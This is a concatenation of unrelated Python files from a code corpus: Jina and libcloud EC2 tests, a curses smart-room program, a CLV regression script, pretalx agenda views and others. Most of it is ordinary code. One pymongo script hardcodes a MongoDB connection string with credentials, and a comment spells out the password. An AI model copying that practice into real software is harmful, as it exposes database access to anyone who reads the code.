if user_ids is not None and query is not None:
raise ValueError('Cannot pass both query and user_ids')
if user_ids is not None and not user_ids:
raise ValueError('user_ids must contain at least 1 value')
limit = min(100, limit or 5)
return await self._state.query_members(self, query=query, limit=limit, user_ids=user_ids, presences=presences, cache=cache)
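# Usage sketch (hypothetical values), per the docstring above -- pass a name
# prefix or explicit user IDs, never both in the same call:
#   members = await guild.query_members(query='Dan', limit=10)
#   members = await guild.query_members(user_ids=[111, 222], cache=False)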
async def change_voice_state(self, *, channel, self_mute=False, self_deaf=False):
"""|coro|
Changes client's voice state in the guild.
.. versionadded:: 1.4
Parameters
-----------
channel: Optional[:class:`VoiceChannel`]
Channel the client wants to join. Use ``None`` to disconnect.
self_mute: :class:`bool`
Indicates if the client should be self-muted.
self_deaf: :class:`bool`
Indicates if the client should be self-deafened.
"""
ws = self._state._get_websocket(self.id)
channel_id = channel.id if channel else None
await ws.voice_state(self.id, channel_id, self_mute, self_deaf)
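# Usage sketch: join a voice channel, or pass ``channel=None`` (as documented
# above) to disconnect; ``voice_channel`` here is a hypothetical name:
#   await guild.change_voice_state(channel=voice_channel, self_deaf=True)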
|
py | 1a38ac149da04fd45da28e9c4b8d9f037dd8f880 | #!/usr/bin/env python3
# Copyright (c) 2016 MariaDB Corporation Ab
#
# Use of this software is governed by the Business Source License included
# in the LICENSE.TXT file and at www.mariadb.com/bsl11.
#
# Change Date: 2025-05-25
#
# On the date above, in accordance with the Business Source License, use
# of this software will be governed by version 2 or later of the General
# Public License.
import sys, hashlib, argparse
parser = argparse.ArgumentParser(description = "CDC User manager", epilog = "Append the output of this program to /var/lib/maxscale/<service name>/cdcusers")
parser.add_argument("USER", help="Username")
parser.add_argument("PASSWORD", help="Password")
opts = parser.parse_args(sys.argv[1:])
print((opts.USER + ":") + hashlib.sha1(hashlib.sha1(opts.PASSWORD.encode()).digest()).hexdigest().upper())
|
py | 1a38ac2a912a3002e2a95d1112d927217fd85964 | import os
import shutil
import numpy as np
import pytest
from jina.flow import Flow
from jina import Document
from tests import validate_callback
cur_dir = os.path.dirname(os.path.abspath(__file__))
@pytest.fixture
def uses_no_docker():
os.environ['JINA_QUERY_USES'] = 'indexer_with_ref.yml'
os.environ['JINA_QUERY_USES_INTERNAL'] = ''
os.environ['JINA_QUERY_USES_COMPOUND'] = 'compound-indexer-with-ref.yml'
os.environ['JINA_QUERY_USES_COMPOUND_INTERNAL'] = ''
yield
del os.environ['JINA_QUERY_USES']
del os.environ['JINA_QUERY_USES_COMPOUND']
del os.environ['JINA_QUERY_USES_INTERNAL']
del os.environ['JINA_QUERY_USES_COMPOUND_INTERNAL']
@pytest.fixture
def parallel(request):
os.environ['JINA_TEST_REF_INDEXER_PARALLEL'] = str(request.param)
yield
del os.environ['JINA_TEST_REF_INDEXER_PARALLEL']
@pytest.fixture
def index_docs():
docs = []
for idx in range(0, 100):
doc = Document()
doc.id = f'{idx:0>16}'
doc.embedding = np.array([idx, idx])
docs.append(doc)
return docs
@pytest.fixture
def random_workspace(tmpdir):
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'] = str(tmpdir)
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY'] = str(tmpdir)
yield
del os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER']
del os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY']
@pytest.mark.parametrize('parallel', [1, 2], indirect=True)
def test_indexer_with_ref_indexer(random_workspace, parallel, index_docs, mocker, uses_no_docker):
top_k = 10
with Flow.load_config(os.path.join(cur_dir, 'index.yml')) as index_flow:
index_flow.index(input_fn=index_docs, request_size=10)
mock = mocker.Mock()
def validate_response(resp):
assert len(resp.search.docs) == 1
assert len(resp.search.docs[0].matches) == top_k
query_document = Document()
query_document.embedding = np.array([1, 1])
with Flow.load_config(os.path.join(cur_dir, 'query.yml')) as query_flow:
query_flow.search(input_fn=[query_document], on_done=mock, top_k=top_k)
mock.assert_called_once()
validate_callback(mock, validate_response)
@pytest.mark.parametrize('parallel', [1, 2], indirect=True)
def test_indexer_with_ref_indexer_compound(random_workspace, parallel, index_docs, mocker, uses_no_docker):
top_k = 10
with Flow.load_config(os.path.join(cur_dir, 'compound-index.yml')) as index_flow:
index_flow.index(input_fn=index_docs, request_size=10)
mock = mocker.Mock()
def validate_response(resp):
assert len(resp.search.docs) == 1
assert len(resp.search.docs[0].matches) == top_k
query_document = Document()
query_document.embedding = np.array([1, 1])
with Flow.load_config(os.path.join(cur_dir, 'compound-query.yml')) as query_flow:
query_flow.search(input_fn=[query_document], on_done=mock, top_k=top_k)
mock.assert_called_once()
validate_callback(mock, validate_response)
@pytest.fixture
def random_workspace_move(tmpdir):
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'] = str(tmpdir) + '/index'
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY'] = str(tmpdir) + '/query'
yield
del os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER']
del os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY']
@pytest.mark.parametrize('parallel', [1, 2], indirect=True)
def test_indexer_with_ref_indexer_move(random_workspace_move, parallel, index_docs, mocker, uses_no_docker):
top_k = 10
with Flow.load_config(os.path.join(cur_dir, 'index.yml')) as index_flow:
index_flow.index(input_fn=index_docs, request_size=10)
mock = mocker.Mock()
shutil.copytree(os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'],
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY'])
shutil.rmtree(os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'])
def validate_response(resp):
assert len(resp.search.docs) == 1
assert len(resp.search.docs[0].matches) == top_k
query_document = Document()
query_document.embedding = np.array([1, 1])
with Flow.load_config(os.path.join(cur_dir, 'query.yml')) as query_flow:
query_flow.search(input_fn=[query_document], on_done=mock, top_k=top_k)
mock.assert_called_once()
validate_callback(mock, validate_response)
@pytest.mark.parametrize('parallel', [1, 2], indirect=True)
def test_indexer_with_ref_indexer_compound_move(random_workspace_move, parallel, index_docs, mocker, uses_no_docker):
top_k = 10
with Flow.load_config(os.path.join(cur_dir, 'compound-index.yml')) as index_flow:
index_flow.index(input_fn=index_docs, request_size=10)
mock = mocker.Mock()
shutil.copytree(os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'],
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY'])
shutil.rmtree(os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'])
def validate_response(resp):
assert len(resp.search.docs) == 1
assert len(resp.search.docs[0].matches) == top_k
query_document = Document()
query_document.embedding = np.array([1, 1])
with Flow.load_config(os.path.join(cur_dir, 'compound-query.yml')) as query_flow:
query_flow.search(input_fn=[query_document], on_done=mock, top_k=top_k)
mock.assert_called_once()
validate_callback(mock, validate_response)
@pytest.fixture
def docker_image():
from jina.parsers.hub import set_hub_build_parser
from jina.docker.hubio import HubIO
args = set_hub_build_parser().parse_args(
[os.path.join(cur_dir, 'numpyhub')])
HubIO(args).build()
@pytest.fixture
def uses_docker(docker_image):
from jina import __version__ as jina_version
os.environ['JINA_QUERY_USES'] = f'docker://jinahub/pod.indexer.dummynumpyindexer:0.0.0-{jina_version}'
os.environ['JINA_QUERY_USES_COMPOUND'] = f'docker://jinahub/pod.indexer.dummynumpyindexer:0.0.0-{jina_version}'
os.environ['JINA_QUERY_USES_INTERNAL'] = 'indexer_with_ref.yml'
os.environ['JINA_QUERY_USES_COMPOUND_INTERNAL'] = 'compound-indexer-with-ref.yml'
yield
del os.environ['JINA_QUERY_USES']
del os.environ['JINA_QUERY_USES_COMPOUND']
@pytest.fixture
def random_workspace_in_docker(tmpdir):
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER'] = str(tmpdir)
os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY'] = '/docker-workspace'
os.environ['JINA_VOLUMES'] = f'{str(tmpdir)}:/docker-workspace'
yield
del os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER']
del os.environ['JINA_TEST_INDEXER_WITH_REF_INDEXER_QUERY']
del os.environ['JINA_VOLUMES']
@pytest.mark.parametrize('parallel', [1, 2], indirect=True)
def test_indexer_with_ref_indexer_in_docker(random_workspace_in_docker, parallel, index_docs, mocker, uses_docker):
top_k = 10
with Flow.load_config(os.path.join(cur_dir, 'index.yml')) as index_flow:
index_flow.index(input_fn=index_docs, request_size=10)
mock = mocker.Mock()
def validate_response(resp):
assert len(resp.search.docs) == 1
assert len(resp.search.docs[0].matches) == top_k
query_document = Document()
query_document.embedding = np.array([1, 1])
with Flow.load_config(os.path.join(cur_dir, 'query.yml')) as query_flow:
query_flow.search(input_fn=[query_document], on_done=mock, top_k=top_k)
mock.assert_called_once()
validate_callback(mock, validate_response)
@pytest.mark.parametrize('parallel', [1, 2], indirect=True)
def test_indexer_with_ref_indexer_compound_in_docker(random_workspace_in_docker, parallel, index_docs, mocker, uses_docker):
top_k = 10
with Flow.load_config(os.path.join(cur_dir, 'compound-index.yml')) as index_flow:
index_flow.index(input_fn=index_docs, request_size=10)
mock = mocker.Mock()
def validate_response(resp):
assert len(resp.search.docs) == 1
assert len(resp.search.docs[0].matches) == top_k
query_document = Document()
query_document.embedding = np.array([1, 1])
with Flow.load_config(os.path.join(cur_dir, 'compound-query.yml')) as query_flow:
query_flow.search(input_fn=[query_document], on_done=mock, top_k=top_k)
mock.assert_called_once()
validate_callback(mock, validate_response)
|
py | 1a38ac737c6c10284f6e3b3677dddd70f3405861 | #!/usr/bin/env python3
from sensor import sensor
from room_devices import room_devices
from mqtt import mqtt
# from instance import room_devices
from threading import Thread
import curses
import time
def salutation(screen):
screen.addstr(0, 0, "digite 0 para sair do programa")
screen.addstr(1, 0, "digite 1 para adicionar um novo dispositivo")
screen.addstr(2, 0, "digite 2 para setar o estado de um dispositivo")
screen.addstr(3, 0, "digite 3 para parar o alarme")
def input_str(screen, y_pos: int, length: int, instructions: str = "") -> str:
screen.clear()
screen.nodelay(False)
curses.echo()
screen.addstr(y_pos - 1, 0, instructions)
screen.refresh()
string = screen.getstr(y_pos, 0, length)
curses.noecho()
screen.nodelay(True)
return string.decode("utf-8")
# mqtt = Mqtt()
if __name__ == "__main__":
try:
polling = room_devices.run_polling()
screen = curses.initscr()
curses.noecho()
screen.nodelay(True)
flag = -1
y_pos = 4
while flag != ord("0"):
screen.clear()
salutation(screen)
room_devices.print_device(screen)
temp, hum = sensor()
screen.addstr(4, 0, f"cรดmodo central. Humidade: {hum} Temperatura {temp}")
if(flag == ord("1")):
room = input_str(screen,2,50,"enter the room name")
input_device = input_str(screen,2,50,"enter the input device name")
output_device = input_str(screen,2,50,"enter the output device name")
room_devices.esp_defined_device.update({
room : {
"in": input_device,
"out": output_device
}
})
flag_device = input_str(screen,2,1,"type 1 to define the device or 0 to use the default")
y_pos += 1
if(int(flag_device)):
matricula = input_str(screen,2,50,"enter the registration id")
mac = input_str(screen,2,50,"enter the MAC address")
thread = Thread(target=mqtt,args = (screen,room,y_pos,matricula,mac), daemon=True)
thread.start()
else:
thread = Thread(target=mqtt,daemon=True,args = (screen,room,y_pos))
thread.start()
elif (flag == ord("2")):
room_name = input_str(screen, 2, 50, "enter the room name")
state = bool(
int(
input_str(
screen,
2,
1,
"digite seu estado(1 ou 0)")))
room_devices.device_set(room_name, state)
elif (flag == ord("3")):
screen.clear()
try:
room_devices.alarm_handle.terminate()
screen.addstr(6, 0, "alarme desligado")
except AttributeError:
screen.addstr(6, 0, "alarme nรฃo foi inicializado")
flag = screen.getch()
time.sleep(1)
except Exception as err:
curses.endwin()
try:
# deallocating memory
room_devices.alarm_handle.close()
except:
pass
# it's easier to debug by raising the error
raise err
curses.endwin()
try:
# deallocating memory
room_devices.alarm_handle.close()
except:
pass
|
py | 1a38acddb326d95510860c354637b60e66919fb6 | # -*- coding: utf-8 -*-
"""Top-level package for owtf-python-client."""
__author__ = """Viyat Bhalodia"""
__email__ = '[email protected]'
__version__ = '0.1.0'
|
py | 1a38ae4767d6b07a23e154a269b92ec51b15689e | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import unittest
import httplib
from libcloud.compute.drivers.ec2 import EC2NodeDriver, EC2APSENodeDriver
from libcloud.compute.drivers.ec2 import NimbusNodeDriver
from libcloud.compute.drivers.ec2 import EC2APNENodeDriver, IdempotentParamError
from libcloud.compute.base import Node, NodeImage, NodeSize, NodeLocation
from test import MockHttp
from test.compute import TestCaseMixin
from test.file_fixtures import ComputeFileFixtures
from test.secrets import EC2_ACCESS_ID, EC2_SECRET
class EC2Tests(unittest.TestCase, TestCaseMixin):
def setUp(self):
EC2NodeDriver.connectionCls.conn_classes = (None, EC2MockHttp)
EC2MockHttp.use_param = 'Action'
EC2MockHttp.type = None
self.driver = EC2NodeDriver(EC2_ACCESS_ID, EC2_SECRET)
def test_create_node(self):
image = NodeImage(id='ami-be3adfd7',
name='ec2-public-images/fedora-8-i386-base-v1.04.manifest.xml',
driver=self.driver)
size = NodeSize('m1.small', 'Small Instance', None, None, None, None, driver=self.driver)
node = self.driver.create_node(name='foo', image=image, size=size)
self.assertEqual(node.id, 'i-2ba64342')
def test_create_node_idempotent(self):
EC2MockHttp.type = 'idempotent'
image = NodeImage(id='ami-be3adfd7',
name='ec2-public-images/fedora-8-i386-base-v1.04.manifest.xml',
driver=self.driver)
size = NodeSize('m1.small', 'Small Instance', None, None, None, None, driver=self.driver)
token = 'testclienttoken'
node = self.driver.create_node(name='foo', image=image, size=size,
ex_clienttoken=token)
self.assertEqual(node.id, 'i-2ba64342')
self.assertEqual(node.extra['clienttoken'], token)
# from: http://docs.amazonwebservices.com/AWSEC2/latest/DeveloperGuide/index.html?Run_Instance_Idempotency.html
# If you repeat the request with the same client token, but change
# another request parameter, Amazon EC2 returns an
# IdempotentParameterMismatch error.
# In our case, changing the parameter doesn't actually matter since we
# are forcing the error response fixture.
EC2MockHttp.type = 'idempotent_mismatch'
idem_error = None
try:
self.driver.create_node(name='foo', image=image, size=size,
ex_mincount='2', ex_maxcount='2', # different count
ex_clienttoken=token)
except IdempotentParamError as e:
idem_error = e
self.assertTrue(idem_error is not None)
def test_create_node_no_availability_zone(self):
image = NodeImage(id='ami-be3adfd7',
name='ec2-public-images/fedora-8-i386-base-v1.04.manifest.xml',
driver=self.driver)
size = NodeSize('m1.small', 'Small Instance', None, None, None, None,
driver=self.driver)
node = self.driver.create_node(name='foo', image=image, size=size)
location = NodeLocation(0, 'Amazon US N. Virginia', 'US', self.driver)
self.assertEqual(node.id, 'i-2ba64342')
node = self.driver.create_node(name='foo', image=image, size=size,
location=location)
self.assertEqual(node.id, 'i-2ba64342')
def test_list_nodes(self):
node = self.driver.list_nodes()[0]
public_ips = sorted(node.public_ip)
self.assertEqual(node.id, 'i-4382922a')
self.assertEqual(len(node.public_ip), 2)
self.assertEqual(public_ips[0], '1.2.3.4')
self.assertEqual(public_ips[1], '1.2.3.5')
def test_list_location(self):
locations = self.driver.list_locations()
self.assertTrue(len(locations) > 0)
self.assertTrue(locations[0].availability_zone is not None)
def test_reboot_node(self):
node = Node('i-4382922a', None, None, None, None, self.driver)
ret = self.driver.reboot_node(node)
self.assertTrue(ret)
def test_destroy_node(self):
node = Node('i-4382922a', None, None, None, None, self.driver)
ret = self.driver.destroy_node(node)
self.assertTrue(ret)
def test_list_sizes(self):
region_old = self.driver.region_name
names = [ ('ec2_us_east', 'us-east-1'),
('ec2_us_west', 'us-west-1'),
('ec2_eu_west', 'eu-west-1'),
('ec2_ap_southeast', 'ap-southeast-1'),
('ec2_ap_northeast', 'ap-northeast-1')
]
for api_name, region_name in names:
self.driver.api_name = api_name
self.driver.region_name = region_name
sizes = self.driver.list_sizes()
ids = [s.id for s in sizes]
self.assertTrue('t1.micro' in ids)
self.assertTrue('m1.small' in ids)
self.assertTrue('m1.large' in ids)
self.assertTrue('m1.xlarge' in ids)
self.assertTrue('c1.medium' in ids)
self.assertTrue('c1.xlarge' in ids)
self.assertTrue('m2.xlarge' in ids)
self.assertTrue('m2.2xlarge' in ids)
self.assertTrue('m2.4xlarge' in ids)
if region_name == 'us-east-1':
self.assertEqual(len(sizes), 11)
self.assertTrue('cg1.4xlarge' in ids)
self.assertTrue('cc1.4xlarge' in ids)
else:
self.assertEqual(len(sizes), 9)
self.driver.region_name = region_old
def test_list_images(self):
images = self.driver.list_images()
image = images[0]
self.assertEqual(len(images), 1)
self.assertEqual(image.name, 'ec2-public-images/fedora-8-i386-base-v1.04.manifest.xml')
self.assertEqual(image.id, 'ami-be3adfd7')
def test_ex_list_availability_zones(self):
availability_zones = self.driver.ex_list_availability_zones()
availability_zone = availability_zones[0]
self.assertTrue(len(availability_zones) > 0)
self.assertEqual(availability_zone.name, 'eu-west-1a')
self.assertEqual(availability_zone.zone_state, 'available')
self.assertEqual(availability_zone.region_name, 'eu-west-1')
def test_ex_describe_tags(self):
node = Node('i-4382922a', None, None, None, None, self.driver)
tags = self.driver.ex_describe_tags(node)
self.assertEqual(len(tags), 3)
self.assertTrue('tag' in tags)
self.assertTrue('owner' in tags)
self.assertTrue('stack' in tags)
def test_ex_create_tags(self):
node = Node('i-4382922a', None, None, None, None, self.driver)
self.driver.ex_create_tags(node, {'sample': 'tag'})
def test_ex_delete_tags(self):
node = Node('i-4382922a', None, None, None, None, self.driver)
self.driver.ex_delete_tags(node, {'sample': 'tag'})
def test_ex_describe_addresses_for_node(self):
node1 = Node('i-4382922a', None, None, None, None, self.driver)
ip_addresses1 = self.driver.ex_describe_addresses_for_node(node1)
node2 = Node('i-4382922b', None, None, None, None, self.driver)
ip_addresses2 = sorted(self.driver.ex_describe_addresses_for_node(node2))
node3 = Node('i-4382922g', None, None, None, None, self.driver)
ip_addresses3 = sorted(self.driver.ex_describe_addresses_for_node(node3))
self.assertEqual(len(ip_addresses1), 1)
self.assertEqual(ip_addresses1[0], '1.2.3.4')
self.assertEqual(len(ip_addresses2), 2)
self.assertEqual(ip_addresses2[0], '1.2.3.5')
self.assertEqual(ip_addresses2[1], '1.2.3.6')
self.assertEqual(len(ip_addresses3), 0)
def test_ex_describe_addresses(self):
node1 = Node('i-4382922a', None, None, None, None, self.driver)
node2 = Node('i-4382922g', None, None, None, None, self.driver)
nodes_elastic_ips1 = self.driver.ex_describe_addresses([node1])
nodes_elastic_ips2 = self.driver.ex_describe_addresses([node2])
self.assertEqual(len(nodes_elastic_ips1), 1)
self.assertTrue(node1.id in nodes_elastic_ips1)
self.assertEqual(nodes_elastic_ips1[node1.id], ['1.2.3.4'])
self.assertEqual(len(nodes_elastic_ips2), 1)
self.assertTrue(node2.id in nodes_elastic_ips2)
self.assertEqual(nodes_elastic_ips2[node2.id], [])
def test_ex_change_node_size_same_size(self):
size = NodeSize('m1.small', 'Small Instance', None, None, None, None, driver=self.driver)
node = Node('i-4382922a', None, None, None, None, self.driver,
extra={'instancetype': 'm1.small'})
try:
self.driver.ex_change_node_size(node=node, new_size=size)
except ValueError:
pass
else:
self.fail('Same size was passed, but an exception was not thrown')
def test_ex_change_node_size(self):
size = NodeSize('m1.large', 'Small Instance', None, None, None, None, driver=self.driver)
node = Node('i-4382922a', None, None, None, None, self.driver,
extra={'instancetype': 'm1.small'})
result = self.driver.ex_change_node_size(node=node, new_size=size)
self.assertTrue(result)
class EC2MockHttp(MockHttp):
fixtures = ComputeFileFixtures('ec2')
def _DescribeInstances(self, method, url, body, headers):
body = self.fixtures.load('describe_instances.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _DescribeAvailabilityZones(self, method, url, body, headers):
body = self.fixtures.load('describe_availability_zones.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _RebootInstances(self, method, url, body, headers):
body = self.fixtures.load('reboot_instances.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _DescribeImages(self, method, url, body, headers):
body = self.fixtures.load('describe_images.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _RunInstances(self, method, url, body, headers):
body = self.fixtures.load('run_instances.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _idempotent_RunInstances(self, method, url, body, headers):
body = self.fixtures.load('run_instances_idem.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _idempotent_mismatch_RunInstances(self, method, url, body, headers):
body = self.fixtures.load('run_instances_idem_mismatch.xml')
return (httplib.BAD_REQUEST, body, {}, httplib.responses[httplib.BAD_REQUEST])
def _TerminateInstances(self, method, url, body, headers):
body = self.fixtures.load('terminate_instances.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _DescribeTags(self, method, url, body, headers):
body = self.fixtures.load('describe_tags.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _CreateTags(self, method, url, body, headers):
body = self.fixtures.load('create_tags.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _DeleteTags(self, method, url, body, headers):
body = self.fixtures.load('delete_tags.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _DescribeAddresses(self, method, url, body, headers):
body = self.fixtures.load('describe_addresses_multi.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _ModifyInstanceAttribute(self, method, url, body, headers):
body = self.fixtures.load('modify_instance_attribute.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
def _idempotent_CreateTags(self, method, url, body, headers):
body = self.fixtures.load('create_tags.xml')
return (httplib.OK, body, {}, httplib.responses[httplib.OK])
class EC2APSETests(EC2Tests):
def setUp(self):
EC2APSENodeDriver.connectionCls.conn_classes = (None, EC2MockHttp)
EC2MockHttp.use_param = 'Action'
EC2MockHttp.type = None
self.driver = EC2APSENodeDriver(EC2_ACCESS_ID, EC2_SECRET)
class EC2APNETests(EC2Tests):
def setUp(self):
EC2APNENodeDriver.connectionCls.conn_classes = (None, EC2MockHttp)
EC2MockHttp.use_param = 'Action'
EC2MockHttp.type = None
self.driver = EC2APNENodeDriver(EC2_ACCESS_ID, EC2_SECRET)
class NimbusTests(EC2Tests):
def setUp(self):
NimbusNodeDriver.connectionCls.conn_classes = (None, EC2MockHttp)
EC2MockHttp.use_param = 'Action'
EC2MockHttp.type = None
self.driver = NimbusNodeDriver(EC2_ACCESS_ID, EC2_SECRET,
host="some.nimbuscloud.com")
def test_ex_describe_addresses_for_node(self):
# overridden from EC2Tests -- Nimbus doesn't support elastic IPs.
node = Node('i-4382922a', None, None, None, None, self.driver)
ip_addresses = self.driver.ex_describe_addresses_for_node(node)
self.assertEqual(len(ip_addresses), 0)
def test_ex_describe_addresses(self):
# overridden from EC2Tests -- Nimbus doesn't support elastic IPs.
node = Node('i-4382922a', None, None, None, None, self.driver)
nodes_elastic_ips = self.driver.ex_describe_addresses([node])
self.assertEqual(len(nodes_elastic_ips), 1)
self.assertEqual(len(nodes_elastic_ips[node.id]), 0)
def test_list_sizes(self):
sizes = self.driver.list_sizes()
ids = [s.id for s in sizes]
self.assertTrue('m1.small' in ids)
self.assertTrue('m1.large' in ids)
self.assertTrue('m1.xlarge' in ids)
def test_list_nodes(self):
# overridden from EC2Tests -- Nimbus doesn't support elastic IPs.
node = self.driver.list_nodes()[0]
public_ips = node.public_ip
self.assertEqual(node.id, 'i-4382922a')
self.assertEqual(len(node.public_ip), 1)
self.assertEqual(public_ips[0], '1.2.3.5')
if __name__ == '__main__':
sys.exit(unittest.main())
|
py | 1a38aec7bbfca483f5972d490b79e8755b202342 | ###########################
#
# #277 A Modified Collatz sequence - Project Euler
# https://projecteuler.net/problem=277
#
# Code by Kevin Marciniak
#
###########################
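# A minimal sketch, not a full solution: the step rules from the problem
# statement, plus a helper that produces the D/U/d sequence string for a
# given starting value.
def next_term(n):
    """Apply one step of the modified Collatz rules from problem 277."""
    if n % 3 == 0:
        return n // 3, 'D'             # Down:       a -> a / 3
    if n % 3 == 1:
        return (4 * n + 2) // 3, 'U'   # Up:         a -> (4a + 2) / 3
    return (2 * n - 1) // 3, 'd'       # small down: a -> (2a - 1) / 3

def sequence_string(n, length):
    """Return the first `length` step letters of the sequence starting at n."""
    letters = []
    for _ in range(length):
        n, letter = next_term(n)
        letters.append(letter)
    return ''.join(letters)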
|
py | 1a38aec9b57f8475e35971bc4e86122d17d73898 | # Predicting Customer Lifetime Value
## Loading and Viewing Data
from pandas import Series, DataFrame
import pandas as pd
import numpy as np
import os
import matplotlib.pylab as plt
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
import sklearn.metrics
raw_data = pd.read_csv("history.csv")
raw_data.dtypes
print(raw_data.head(5))
## Do Correlation Analysis
cleaned_data = raw_data.drop("CUST_ID",axis=1)
cleaned_data.corr()['CLV']
## Do Training and Testing Split
# Let us split the data into training and testing datasets in the ratio 90:10.
predictors = cleaned_data.drop("CLV",axis=1)
targets = cleaned_data.CLV
pred_train, pred_test, tar_train, tar_test = train_test_split(predictors, targets, test_size=.1)
print( "Predictor - Training : ", pred_train.shape, "Predictor - Testing : ", pred_test.shape )
## Build and Test Model
# Build model on training data
model = LinearRegression()
model.fit(pred_train,tar_train)
print("Coefficients: \n", model.coef_)
print("Intercept:", model.intercept_)
# Test on testing data
predictions = model.predict(pred_test)
predictions
sklearn.metrics.r2_score(tar_test, predictions)
## Predicting for a new Customer
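# NOTE (assumption): the six values below must follow the column order of
# `predictors`, i.e. the history.csv columns minus CUST_ID and CLV.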
new_data = np.array([100,0,50,0,0,0]).reshape(1, -1)
new_pred = model.predict(new_data)
print("The CLV for the new customer is: $", new_pred[0]) |
py | 1a38afad5288cf0593e0071d0fbcaa8701ddee7b | from pymongo import MongoClient
# pprint library is used to make the output look prettier
from pprint import pprint
# connect to MongoDB, change the << MONGODB URL >> to reflect your own connection string
#Username = capstone, password=mongopassword, databasename = hunter_collab
client = MongoClient("mongodb://capstone:[email protected]:27017,cluster0-shard-00-01-we2hu.mongodb.net:27017,cluster0-shard-00-02-we2hu.mongodb.net:27017/client_example?ssl=true&replicaSet=Cluster0-shard-0&authSource=admin&retryWrites=true")
adminDB = client.admin
db = client.hunter_collab
# Issue the serverStatus command and print the results
serverStatusResult=adminDB.command("serverStatus")
#pprint(serverStatusResult)
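# Usage sketch (assumes a hypothetical 'users' collection in hunter_collab):
#   for doc in db.users.find().limit(5):
#       pprint(doc)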
|
py | 1a38afafe71e8d312fcdedc726fdd16eecfa0414 | from contextlib import suppress
from urllib.parse import urlparse
import vobject
from django.conf import settings
from django.contrib import messages
from django.db.models import Q
from django.http import Http404, HttpResponse
from django.shortcuts import render
from django.utils.functional import cached_property
from django.utils.translation import ugettext_lazy as _
from django.views.generic import DetailView, FormView, ListView
from pretalx.agenda.signals import register_recording_provider
from pretalx.cfp.views.event import EventPageMixin
from pretalx.common.mixins.views import (
EventPermissionRequired, Filterable, PermissionRequired,
)
from pretalx.common.phrases import phrases
from pretalx.person.models.profile import SpeakerProfile
from pretalx.schedule.models import Schedule, TalkSlot
from pretalx.submission.forms import FeedbackForm
from pretalx.submission.models import Feedback, QuestionTarget, Submission
class TalkList(EventPermissionRequired, Filterable, ListView):
context_object_name = 'talks'
model = Submission
template_name = 'agenda/talks.html'
permission_required = 'agenda.view_schedule'
default_filters = ('speakers__name__icontains', 'title__icontains')
def get_queryset(self):
return self.filter_queryset(self.request.event.talks).distinct()
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['search'] = self.request.GET.get('q')
return context
class SpeakerList(EventPermissionRequired, Filterable, ListView):
context_object_name = 'speakers'
template_name = 'agenda/speakers.html'
permission_required = 'agenda.view_schedule'
default_filters = ('user__name__icontains',)
def get_queryset(self):
qs = SpeakerProfile.objects.filter(
user__in=self.request.event.speakers, event=self.request.event
).select_related('user', 'event')
return self.filter_queryset(qs)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['search'] = self.request.GET.get('q')
return context
class TalkView(PermissionRequired, DetailView):
context_object_name = 'submission'
model = Submission
slug_field = 'code'
template_name = 'agenda/talk.html'
permission_required = 'agenda.view_slot'
def get_object(self, queryset=None):
with suppress(AttributeError, Submission.DoesNotExist):
return self.request.event.talks.get(
code__iexact=self.kwargs['slug'],
)
if getattr(self.request, 'is_orga', False):
talk = self.request.event.wip_schedule.talks.filter(
submission__code__iexact=self.kwargs['slug'], is_visible=True
).first()
if talk:
return talk.submission
raise Http404()
@cached_property
def recording(self):
for receiver, response in register_recording_provider.send_robust(
self.request.event
):
if (
response
and not isinstance(response, Exception)
and hasattr(response, 'get_recording')
):
recording = response.get_recording(self.object)
if recording and recording['iframe']:
return recording
else:
print(response)
if self.object.rendered_recording_iframe:
return {
'iframe': self.object.rendered_recording_iframe,
'csp_header': 'https://media.ccc.de',
}
return {}
def get(self, request, *args, **kwargs):
response = super().get(request, *args, **kwargs)
if self.recording.get('csp_header'):
response._csp_update = {'child-src': self.recording.get('csp_header')}
return response
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
qs = TalkSlot.objects.none()
schedule = Schedule.objects.none()
submission = self.object
if self.request.event.current_schedule:
schedule = self.request.event.current_schedule
qs = schedule.talks.filter(is_visible=True)
elif self.request.is_orga:
schedule = self.request.event.wip_schedule
qs = schedule.talks.all()
context['talk_slots'] = qs.filter(submission=submission).order_by('start')
